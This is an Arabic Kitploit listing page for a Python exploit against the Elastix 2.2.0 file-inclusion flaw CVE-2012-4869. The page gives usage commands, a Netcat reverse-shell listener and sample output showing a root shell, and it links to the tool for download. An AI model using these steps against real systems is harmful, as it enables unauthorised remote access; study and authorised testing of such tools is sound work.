Skip to content
KitploitKITPLOIT
أدواتالمدونة
Log in
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Elastix-2.2.0-CVE-2012-4869 — سكريبت استغلال بلغة بايثون لثغرة الـ LFI في Elastix 2.2.0 (CVE-2012-4869) تمكن من تنفيذ كود عن بعد عبر حقن حمولة شِل عكسي بلغة Perl. | Kitploit
أدوات/GitHubGitHub/cyberdesu/elastix-2.2.0-cve-2012-4869
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليمتطوير الحمولات
GitHubcyberdesu/elastix-2.2.0-cve-2012-4869

Elastix-2.2.0-CVE-2012-4869

سكريبت استغلال بلغة بايثون لثغرة الـ LFI في Elastix 2.2.0 (CVE-2012-4869) تمكن من تنفيذ كود عن بعد عبر حقن حمولة شِل عكسي بلغة Perl.

عرض المستودع
6منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

إكسسوار تضمين الملفات المحلية لـ Elastix 2.2.0 - CVE-2012-4869

الوصف

يستغل هذا السكريبت ثغرة تضمين الملفات المحلية (LFI) في Elastix 2.2.0، مما يسمح بتنفيذ الأوامر عن بُعد (RCE) عن طريق حقن الأوامر عبر نقطة النهاية callme_page.php. يعتمد الإكسسوار على CVE-2012-4869.

الميزات

  • يتجاوز التحقق من شهادة TLS.
  • يستخدم حمولة شل عكسية بلغة Perl.
  • يدعم LHOST و LPORT مخصصين للشل العكسية.
  • يخفي تحذيرات أمان HTTPS.

المتطلبات

  • Python 3
  • وحدة requests

قم بتثبيت التبعيات باستخدام:

pip install requests

الاستخدام

python exploit.py <URL> --LHOST <YOUR_IP> --LPORT <YOUR_PORT>

مثال:

python exploit.py "https://10.129.229.183" --LHOST "10.10.14.23" --LPORT 9001

إعداد مستمع الشل العكسية

قبل تشغيل الإكسسوار، ابدأ مستمع Netcat على جهازك:

nc -lvnp 9001

مخرجات تنفيذ الإكسسوار

[*] Running Elastix 2.2.0 LFI Exploit - CVE-2012-4869
[*] Target: https://10.129.229.183
[*] Listening on 10.10.14.23:9001

[+] Exploit sent successfully, waiting for reverse shell...

[+] Connection from 10.129.229.183:41242
$ id
uid=0(root) gid=0(root) groups=0(root)

ملاحظات

  • إذا لم تتصل الشل العكسية، تأكد من أن قواعد جدار الحماية وإعدادات SELinux تسمح بالاتصالات الصادرة.
  • يمكن استخدام حمولات بديلة (مثل Bash أو Python) إذا كانت Perl غير متوفرة.
  • تأكد من أن LHOST الخاص بك يمكن الوصول إليه من الجهاز الهدف.

إخلاء مسؤولية

هذا الإكسسوار مخصص للأغراض التعليمية واختبار الأمان المصرح به فقط. الاستخدام غير المصرح به غير قانوني. المؤلف غير مسؤول عن إساءة استخدام هذه الأداة.

تنزيل الأداة